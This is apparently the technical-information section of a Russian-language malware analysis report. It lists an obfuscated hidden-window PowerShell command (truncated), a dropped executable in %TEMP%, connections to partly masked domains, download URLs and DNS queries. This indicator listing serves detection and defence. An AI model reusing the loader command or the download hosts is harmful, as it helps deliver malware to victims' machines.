Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STRiNg]::JOin('',( ( 57,103 ,127,72,32 , 115,120,106 , 48, 114, 127 , 119 ,120, 126,105,61,83 , 120 , 105 , 51 , 74,120 ,127, 94, 113 ,116 ,120 , 115, 105 ,38,57, 91 , 92, 109 , 32,58,117, 105...
- %TEMP%\707.exe
- %TEMP%\707.exe
- %TEMP%\707.exe
- 'ec####resort.com':80
- 'ky##3.com':443
- 'do###nieni.pl':80
- http://www.ec####resort.com/Oa/
- http://www.do###nieni.pl/Fk5j/
- 'ky##3.com':443
- DNS ASK ec####resort.com
- DNS ASK de####tcake.com.ua
- DNS ASK ky##3.com
- DNS ASK hu####-kings.com
- DNS ASK do###nieni.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STRiNg]::JOin('',( ( 57,103 ,127,72,32 , 115,120,106 , 48, 114, 127 , 119 ,120, 126,105,61,83 , 120 , 105 , 51 , 74,120 ,127, 94, 113 ,116 ,120 , 115, 105 ,38,57, 91 , 92, 109 , 32,58,117, 105...' (со скрытым окном)